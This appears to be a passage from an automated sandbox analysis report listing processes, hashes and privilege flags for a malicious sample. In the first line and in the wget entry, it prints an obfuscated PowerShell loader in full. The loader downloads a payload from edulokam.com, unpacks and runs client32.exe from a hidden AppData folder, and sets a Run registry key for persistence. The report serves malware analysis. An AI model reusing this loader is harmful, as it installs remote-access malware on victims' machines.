"http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;" > cmdline.out 2>&1
Imagebase:0x790000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:1
Start time:17:28:14
Start date:25/03/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff6d64d0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

Target ID:2
Start time:17:28:14
Start date:25/03/2024
Path:C:\Windows\SysWOW64\wget.exe
Wow64 process (32bit):true
Commandline:wget -t 2 -v -T 60 -P "C:\Users\user\Desktop\download" --no-check-certificate --content-disposition --user-agent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko" "http://C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe%22%20-Ex%20Bypass%20-NoP%20-C%20$PTBtYpeCFHynkdkoevUtEl='https://edulokam.com/data.php?14831';$gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl=(New-Object%20System.Net.WebClient).DownloadString($PTBtYpeCFHynkdkoevUtEl);$arxPMyynqrYXFJuXGWYmMP=%5BSystem.Convert%5D::FromBase64String($gopmqUMpEjzoPqVNEpYiXTOQjcWDazgqQl);$zxc%20=%20Get-Random%20-Minimum%20-10%20-Maximum%2037;%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy=%5BSystem.Environment%5D::GetFolderPath('ApplicationData')+'%5CDIVX'+$zxc;if%20(!(Test-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-PathType%20Container))%20%7B%20New-Item%20-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-ItemType%20Directory%20%7D;$p=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'WWW.zip';%5BSystem.IO.File%5D::WriteAllBytes($p,$arxPMyynqrYXFJuXGWYmMP);try%20%7B%20Add-Type%20-A%20System.IO.Compression.FileSystem;%5BSystem.IO.Compression.ZipFile%5D::ExtractToDirectory($p,$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy)%7D%20catch%20%7B%20Write-Host%20'Failed:%20'%20+%20$_;%20exit%7D;$CV=Join-Path%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20'client32.exe';if%20(Test-Path%20$CV%20-PathType%20Leaf)%20%7B%20Start-Process%20-FilePath%20$CV%7D%20else%20%7B%20Write-Host%20'No%20exe.'%7D;$AZ=Get-Item%20$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy%20-Force;%20$AZ.attributes='Hidden';$s=$jSzJrBPlfPTuRAeEvyssvqzoqSuyxzkRy+'%5Cclient32.exe';$k='HKCU:%5CSOFTWARE%5CMicrosoft%5CWindows%5CCurrentVersion%5CRun';$v='OFFICEC';$DS='String';New-ItemProperty%20-Path%20$k%20-Name%20$v%20-Value%20$s%20-PropertyType%20$DS;"
Imagebase:0x400000
File size:3'895'184 bytes
MD5 hash:3DADB6E2ECE9C4B3E1E322E617658B60
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:low
Has exited:true

No disassembly